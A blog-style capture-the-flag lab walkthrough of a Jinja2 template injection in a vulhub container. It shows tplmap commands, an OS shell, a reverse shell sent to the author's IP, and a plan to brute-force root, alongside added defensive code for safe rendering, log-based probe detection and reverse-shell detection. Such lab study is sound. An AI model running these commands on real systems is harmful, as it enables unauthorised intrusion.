Setting up the target environment
Here I used the vulhub collection.
One-click install script for mainland China:
curl -sSL https://get.daocloud.io/docker | sh
After installation it should be usable directly as root; I added root to the docker group.
Start docker:
sudo systemctl start docker
Verify that it works:
sudo docker run hello-world
Enable it at boot:
sudo systemctl enable docker
Install docker-compose:
pip install docker-compose
Download vulhub:
git clone https://github.com/vulhub/vulhub.git
Enter flask/ssti and run docker-compose build && docker-compose up -d
to start the container.
Visit port 8000 on the host IP; if the following page appears, the container started successfully.
(Screenshot: ssti/image-20210116213526726.png)
Introduction to SSTI
SSTI stands for server-side template injection (roughly); for details see the article "一篇文章带你理解漏洞之SSTI漏洞".
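To make the vulnerability concrete before running any tool, here is an added example (not from the original post or from vulhub) showing the Flask/Jinja2 pattern that makes the lab's name parameter injectable, next to the fixed form and a sandboxed form. It uses the jinja2 package directly rather than Flask, so it assumes only that jinja2 is installed; the function names and the "Hello" template are my own.

```python
"""Added example (not from the original post): the Jinja2 SSTI pattern and two
defensive alternatives. Assumes the jinja2 package is installed."""
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment


def render_unsafe(name: str) -> str:
    """The vulnerable pattern: user input is concatenated into the template
    source, so any template syntax inside `name` is parsed and evaluated."""
    return Environment().from_string("Hello " + name).render()


def render_safe(name: str) -> str:
    """The fix: the template source is a constant and user input enters only
    as a context variable, so it is treated as data and never parsed."""
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ name }}").render(name=name)


def render_sandboxed(name: str) -> str:
    """Defence in depth, not a fix: SandboxedEnvironment still evaluates
    expressions, but refuses attributes whose name starts with '_' (they
    render as an empty Undefined), which breaks the class-walking chain the
    post describes. It must never replace the fix above."""
    return SandboxedEnvironment().from_string("Hello " + name).render()


if __name__ == "__main__":
    probe = "{{ 7*7 }}"  # the arithmetic rendering probe that tplmap relies on
    print(render_unsafe(probe))     # Hello 49        <- expression evaluated
    print(render_safe(probe))       # Hello {{ 7*7 }} <- echoed as literal text
    print(render_sandboxed(probe))  # Hello 49        <- sandbox does not stop this
    print(render_sandboxed("{{ ''.__class__ }}"))  # Hello  (attribute refused)
```

The detection logic tplmap prints below ("testing rendering with tag '{{*}}'") is exactly the first case: the tool submits an expression and checks whether the response contains its evaluated value.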
Penetration attempt
SSTI requires guessing which parameters the target accepts, so using an automated tool to detect it is a good choice; here I use tplmap.
Later I found that tplmap can only tell whether a parameter is injectable; it cannot discover the injectable parameter name.
Installing tplmap
I am using a Kali VM: git clone https://github.com/epinna/tplmap
I ran into many problems installing pip along the way. Note: if you build it yourself, watch the version.
To install pip, download get-pip.py (https://bootstrap.pypa.io/get-pip.py) and run
python get-pip.py
to install pip for the specified Python version.
I installed python3 first, which produced pip, pip3 and pip3.8,
then installed python2, which overwrote pip, so the two coexist.
tplmap is Python 2.
After installing the requirements it is ready to use.
Trying tplmap
┌──(root💀kali)-[~/tplmap]
└─# ./tplmap.py -u "http://115.154.173.197:57990/?name=aaa"
[+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin is testing blind injection
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Rerun tplmap providing one of the following options:
--os-shell Run shell on the target
--os-cmd Execute shell commands
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files
┌──(root💀kali)-[~/tplmap]
└─# ./tplmap.py -u "http://115.154.173.197:57990/?name=aaa" --os-shell
[+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin is testing blind injection
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Run commands on the operating system.
posix-linux $ ls
app.py
As you can see, commands can now be executed from the terminal.
Alternatively, run a command directly:
./tplmap.py -u "http://115.154.173.197:57990/?name=aaa" --os-cmd "ls /"
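From the defender's side, the two tplmap runs above are very noisy: within a second or two one client sends the same parameter with every engine's probe syntax ('*', '${*}', 'str(*)', '{{*}}'). The following added example (not from the original post or from tplmap) scans access-log lines for query parameters carrying template syntax and flags a source IP once it crosses a hit threshold. The log lines, IPs and timestamps are constructed for the example; the marker patterns are my own choice.

```python
"""Added example (not from the original post): spotting tplmap-style SSTI
probing in web server access logs. Uses only the standard library."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Combined-log-format lines, constructed for this example (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jan/2021:12:10:01 +0800] "GET /?name=aaa HTTP/1.1" 200 128
10.0.0.5 - - [17/Jan/2021:12:10:02 +0800] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 130
10.0.0.5 - - [17/Jan/2021:12:10:02 +0800] "GET /?name=%24%7B7*7%7D HTTP/1.1" 200 133
10.0.0.5 - - [17/Jan/2021:12:10:03 +0800] "GET /?name=str(7*7) HTTP/1.1" 200 134
10.0.0.5 - - [17/Jan/2021:12:10:03 +0800] "GET /?name=%7B%7B%27%27.__class__%7D%7D HTTP/1.1" 200 140
10.0.0.9 - - [17/Jan/2021:12:11:40 +0800] "GET /?name=Alice HTTP/1.1" 200 130
10.0.0.9 - - [17/Jan/2021:12:11:41 +0800] "GET /?name=O%27Brien HTTP/1.1" 200 132
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Template-expression shapes for the engines tplmap probed above, plus the
# dunder attribute names a Jinja2 payload needs. A bare "7*7" is deliberately
# not a marker on its own: it appears in legitimate input far too often.
TEMPLATE_MARKERS = [
    re.compile(r"\{\{.*?\}\}"),                  # Jinja2 / Tornado / Twig
    re.compile(r"\$\{.*?\}"),                    # Mako / FreeMarker / Velocity
    re.compile(r"<%.*?%>"),                      # ERB / JSP / Mako control blocks
    re.compile(r"\bstr\(\s*\d+\s*[*+]\s*\d+\s*\)"),  # tplmap's Python-plugin probe
    re.compile(r"__\w+__"),                      # __class__, __globals__, ...
]


def suspicious_params(target: str) -> list:
    """Return (param, decoded_value, pattern) for every query parameter whose
    decoded value contains template syntax. The value is decoded a second
    time so a double-encoded probe (%2525...) is still caught."""
    hits = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote_plus(value)
        for marker in TEMPLATE_MARKERS:
            if marker.search(value):
                hits.append((key, value, marker.pattern))
                break
    return hits


def scan(log_text: str, threshold: int = 3) -> dict:
    """Parse log lines, count probe hits per source IP and return
    {ip: {"hits": n, "samples": [...]}} for IPs at or above the threshold.
    The threshold separates one odd request from an automated scan."""
    per_ip = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a log line we understand; skip rather than crash
        hits = suspicious_params(m.group("target"))
        if not hits:
            continue
        entry = per_ip.setdefault(m.group("ip"), {"hits": 0, "samples": []})
        entry["hits"] += len(hits)
        entry["samples"].extend(f"{k}={v}" for k, v, _ in hits)
    return {ip: e for ip, e in per_ip.items() if e["hits"] >= threshold}


if __name__ == "__main__":
    for ip, entry in scan(SAMPLE_LOG).items():
        print(f"[!] {ip}: {entry['hits']} template-syntax probes, e.g. {entry['samples'][0]}")
```

Run against the constructed log, only 10.0.0.5 is reported (four probing requests); the apostrophe in O'Brien from 10.0.0.9 is harmless and produces no hit. The same function can be pointed at a real access log by replacing SAMPLE_LOG with the file contents.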
Manual attempt
The operations above didn't produce anything useful, so let's try by hand and learn the underlying principle.
Couldn't follow it (ugh).
I roughly understood the injection method: in Python you pick any class, go to its base class, find a class that can import os, and then use os to perform system operations, but it is rather tedious. Let's go back to studying tplmap.
tplmap revisited
We just tried --os-shell and --os-cmd to run commands, but commands that fail to execute give no output, which is annoying, so next we use a reverse shell to run commands locally.
First I opened port 5656 on my local machine, then:
┌──(root💀kali)-[~/tplmap]
└─# ./tplmap.py -u "http://115.154.173.197:57990/?name=aaa" --engine=jinja2 --reverse-shell 115.154.195.137 5656
[+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'name' is injectable
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Incoming connection accepted
/bin/sh: 0: can't access tty; job control turned off
$ ls
app.py
$ whoami
www-data
$ $ mkdir aa
mkdir: cannot create directory ‘aa’: Permission denied
As you can see, we can now type commands directly on the local machine.
My guess at the principle is this: the target host opens a TCP connection, invokes bash, and redirects its input and output to that connection.
Running ps aux confirms this.
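The shape inferred from ps aux (a shell whose input and output are a TCP connection) is also what a host-side check can look for. The following added example (not from the original post or from tplmap) walks /proc on Linux and reports any shell or interpreter whose file descriptors 0, 1 and 2 all point at the same socket, which is how an interactive shell looks when its stdio has been redirected to a connection instead of a pty. The classifier is a pure function so it can be exercised on constructed fd data; the list of shell names is my own assumption, and variants that pass through a FIFO show pipe:[...] instead and are not caught by this check.

```python
"""Added example (not from the original post): a host-side check for a shell
whose stdin, stdout and stderr are all the same socket. Linux /proc only."""
import os
import re

# Process names treated as shells/interpreters (assumption for this example).
SHELLS = {"sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl"}
SOCKET_RE = re.compile(r"socket:\[\d+\]")


def stdio_links(pid: int) -> dict:
    """Read the symlink targets of fds 0-2 from /proc/<pid>/fd.
    Missing or unreadable fds (races, permissions) are simply skipped."""
    links = {}
    for fd in (0, 1, 2):
        try:
            links[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:
            pass
    return links


def is_socket_stdio_shell(comm: str, links: dict) -> bool:
    """True when `comm` is a shell/interpreter and fds 0, 1 and 2 all resolve
    to the same socket inode, e.g. {0: 'socket:[4242]', 1: 'socket:[4242]',
    2: 'socket:[4242]'}. An interactive shell has a pty such as /dev/pts/0
    here, and a daemon usually has /dev/null or a log file."""
    if comm not in SHELLS:
        return False
    targets = [links.get(fd) for fd in (0, 1, 2)]
    if not all(t and SOCKET_RE.fullmatch(t) for t in targets):
        return False
    return len(set(targets)) == 1  # same inode on all three, i.e. one connection


def find_suspects() -> list:
    """Walk /proc and return (pid, comm, ppid) for every matching process.
    The parent pid matters: a shell spawned by a web server worker is the
    pattern seen in the lab above."""
    suspects = []
    if not os.path.isdir("/proc"):
        return suspects  # not Linux, nothing to inspect
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/status") as f:
                ppid = next((l.split()[1] for l in f if l.startswith("PPid:")), "0")
        except OSError:
            continue  # process exited or is not readable by us
        if is_socket_stdio_shell(comm, stdio_links(pid)):
            suspects.append((pid, comm, int(ppid)))
    return suspects


if __name__ == "__main__":
    for pid, comm, ppid in find_suspects():
        print(f"[!] pid {pid} ({comm}) has socket stdio; parent pid {ppid}")
```

Run as root inside the container (or on the host with the container's pid namespace visible), the www-data shell from the session above shows up with its parent being the Flask worker; the Permission denied on mkdir is exactly what you would expect for that account.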
(Screenshot: ssti/image-20210117121407894.png)
One benefit of this is that you can clearly see when permissions don't allow something.
Next, the only thing I can think of is brute-forcing the root password with su.
Besides that there are three more operations, --bind-shell PORT, --upload LOCAL REMOTE and --download REMOTE LOCAL, but my attempts at them failed, hahahaha.
Summary
I understood the principle of the SSTI attack and got a first look at installing and using tplmap.
Although I haven't thought of what to do next, it counts as a first step into the field.
Also:
The principle is really hard; being a script kiddie feels great.